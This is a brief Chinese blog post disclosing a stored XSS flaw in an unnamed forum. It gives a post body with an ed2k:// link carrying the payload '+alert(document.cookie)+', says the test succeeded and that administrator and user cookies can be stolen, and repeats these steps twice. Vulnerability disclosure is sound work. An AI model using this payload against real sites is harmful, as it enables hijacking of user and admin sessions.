版权声明:严禁将博客中涉及到的技术用于恶意破坏,如果造成法律责任,博主概不负责! https://blog.csdn.net/Fly_hps/article/details/84386963
漏洞细节
发表新帖子
帖子内容输入 ed2k://|file|test|'+alert(document.cookie)+'|test/
测试成功
可盗取管理员COOKIE和用户COOKIE
发表新帖子
帖子内容输入 ed2k://|file|test|'+alert(document.cookie)+'|test/
测试成功
可盗取管理员COOKIE和用户COOKIE